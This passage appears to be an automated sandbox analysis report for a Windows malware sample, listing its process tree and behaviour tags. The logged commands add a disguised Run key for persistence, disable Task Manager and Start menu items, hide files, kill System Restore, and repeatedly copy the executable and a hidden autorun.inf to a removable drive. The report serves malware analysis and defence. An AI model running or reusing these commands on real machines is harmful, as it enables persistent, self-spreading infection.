PID 3708 wrote to memory of 1244	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 1244	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 1244	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 2284	3708	CMD.EXE	taskkill.exe

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

pid	process
4496	attrib.exe
3868
2452	attrib.exe
4172	attrib.exe
3048	attrib.exe
4424	attrib.exe
4500	attrib.exe
2076	attrib.exe
4700	attrib.exe
5116	attrib.exe
4452	attrib.exe
3676	attrib.exe
1896
4416	attrib.exe
2908
4364
4356	attrib.exe
4492
3676	attrib.exe
696	attrib.exe
3992
1552	attrib.exe
3736	attrib.exe
3040	attrib.exe
1808
5068	attrib.exe
3668	attrib.exe
4032	attrib.exe
460	attrib.exe
2584	attrib.exe
4560	attrib.exe
800	attrib.exe
1396	attrib.exe
4700	attrib.exe
3344	attrib.exe
2584	attrib.exe
4860	attrib.exe
5108	attrib.exe
2492
4604
1388	attrib.exe
2528	attrib.exe
4948	attrib.exe
3180	attrib.exe
3896	attrib.exe
5108
4468	attrib.exe
3124
2920
4836
2352
3092	attrib.exe
3448	attrib.exe
3040	attrib.exe
4036	attrib.exe
4648	attrib.exe
3424	attrib.exe
4236	attrib.exe
3564
2320	attrib.exe
4520
3244
1660
3100	attrib.exe

C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4912
- C:\Windows\SysWOW64\CMD.EXE
  CMD.EXE /C "%windir%\system32\windows_update.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3708
- - C:\Windows\SysWOW64\reg.exe
    reg add hklm\software\microsoft\windows\currentversion\run /v Micr0soft /t reg_sz /d "C:\WINDOWS\system32\foto.exe" /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:1284
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t reg_dword /d 00000001
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\reg.exe
    Reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /t reg_dword /d 00000001 /f
    3⤵
    PID:1252
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t reg_dword /d 00000001
    3⤵
    PID:3632
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +r C:\Windows\system32\foto.exe /s
    3⤵
    - Views/modifies file attributes
    PID:1396
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r C:\Windows\system32\windows_update.bat /s
    3⤵
    - Drops file in System32 directory
    PID:3512
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Roaming\SubmitImport.system"
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s +r "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"
    3⤵
    PID:4260
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2076
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1652
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    PID:2532
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3124
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3424
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2596
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1216
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4172
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4056
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2568
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1244
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2284
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:3896
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3060
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1056
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:116
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:2388
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:716
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3408
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:5068
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:880
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3208
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3508
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3604
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3640
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4828
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5044
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3472
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:5060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:684
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3712
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    PID:5096
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2528
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3776
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4536
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2712
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4936
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3212
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:3148
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4336
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1396
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4540
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3516
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:4280
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2944
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4652
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:3256
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3228
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:228
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1504
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4692
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3584
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:712
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2080
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3896
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3544
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1056
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2388
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:3300
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4528
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:460
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:716
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:3344
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3448
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4292
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2948
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:880
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2456
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4576
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:360
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3604
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1116
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4368
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5028
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3980
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:4700
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:772
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1324
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:3092
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3700
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3572
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3676
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:224
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:3668
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4328
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4284
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:4540
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2252
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4400
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2408
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:4008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:508
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:228
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2596
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4780
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:4468
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3984
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2072
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2388
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3300
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:4088
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3200
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4676
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4292
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4868
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1952
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2452
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5052
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:836
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:4768
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:3640
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3604
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:4020
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:4756
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4956
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:3116
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:5028
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3980
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    - Enumerates system info in registry
    PID:1016
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:772
- - C:\Windows\SysWOW64\attrib.exe
